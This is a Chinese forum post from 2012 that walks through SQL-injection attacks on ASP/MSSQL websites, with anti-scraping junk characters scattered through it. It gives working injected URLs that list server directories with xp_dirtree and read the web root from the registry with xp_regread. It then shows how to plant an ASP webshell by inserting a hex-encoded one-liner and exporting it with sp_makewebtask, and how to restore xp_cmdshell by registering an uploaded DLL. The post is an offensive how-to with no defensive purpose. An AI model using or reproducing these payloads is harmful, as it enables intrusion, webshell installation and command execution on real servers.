好,我们exec master..xp_dirtree'd:/test'
1 r+ u b, q4 f+ V5 f; x4 n3 D假设我们在test里有两个文件夹test1和test2在test1里又有test3
; ] O) A4 R3 w0 P# \. `" K结果显示
+ w7 Z% @2 I! @: A9 V1 a" G& P3 ^: G9 U4 k; n5 ?
subdirectory depth k% E( N; E3 @9 D
test1 1! h) s2 l( x0 W/ i5 v6 q9 H4 d
test3 2% j$ v _$ X0 @2 {# t7 n/ `
test2 1
$ b& g. @$ n n$ A7 z7 W1 u0 A
$ g( |9 X! C9 Q! Y; _/ A9 B哈哈发现没有那个depth就是目录的级数1 ^) `5 A* l* I$ Q
ok了,知道怎么办了吧2 L2 Z y# w* T5 `
, c% T: a+ o1 n: B0 ~ Z- @7 khttp://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)--
0 i4 M- Z# k [; }% hhttp://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' --
. c0 X! o+ l6 X: Whttp://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-
% R) K- V9 q4 d: H& r+ f, m) X E/ F% Z! V
只要加上id=1,就是第一级目录 。
2 r! X- a' z" |; _$ q5 F" \: d* q- K0 s
, ]" w. m. V7 q1 {( g: x通过注册表读网站路径:
# y8 P( R' }* M$ _
4 f" G2 X* k. x, @0 H' \1.;create table [dbo].[cyfd] ([gyfd][char](255));
: X5 {* D* l# p9 @- o. z& {0 u& d
2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--6 e, u( o3 ?, y* Y0 J2 `& k9 C, N
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--
7 j" q2 A+ i2 Y+ ?3 k/ q2 K' i# d, M
3.and 1=(select count(*) from 临时表 where 临时字段名>1)
C; O9 w. Z4 ]1 V7 b" G8 Jand 1=(select count(*) from cyfd where gyfd > 1)
9 P F7 F! {0 n这样IE报错,就把刚才插进去的Web路径的值报出来了* ?8 R, R% {5 F
$ F/ W4 h. A, b% V4.drop table cyfd;-- 删除临时表
3 x- \' s, h& c1 \) d" @
6 P! {5 {' D4 l8 Q s6 P6 H获得webshell方法:
, \& v0 M. _2 U1.create table cmd (a image)-- \**cmd是创建的临时表
2 C: l* E- Q+ p N5 W
. l2 S5 |- x7 p; z4 t! t1 ?2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
0 w1 \8 n8 F. i4 t: _, ^& G
' W( X0 r. o6 M0 ~; F: m6 `# A5 W @& F* J) f% _
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'
+ }" E) G+ j( k4 ^5 O7 D3 JEXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表': P q. o8 O/ N4 C) D4 }
- f$ N& \, e! B- A
4.drop table cmd;-- 删除cmd临时表+ i% y( L, C) S
3 m6 O0 v, @0 d H! K( h7 o
恢复xp_cmdshell方法之一:
0 K1 i7 T+ U2 I1 v$ |我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:$ Z2 k4 `# V* ~/ u3 B/ F
http://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll', c# Q3 P. c. F- k1 P
恢复,支持绝对路径的恢复哦。:)
$ g3 k- y* D+ {$ h |
发表于 2012-9-13 17:20:30
收藏
支持
反对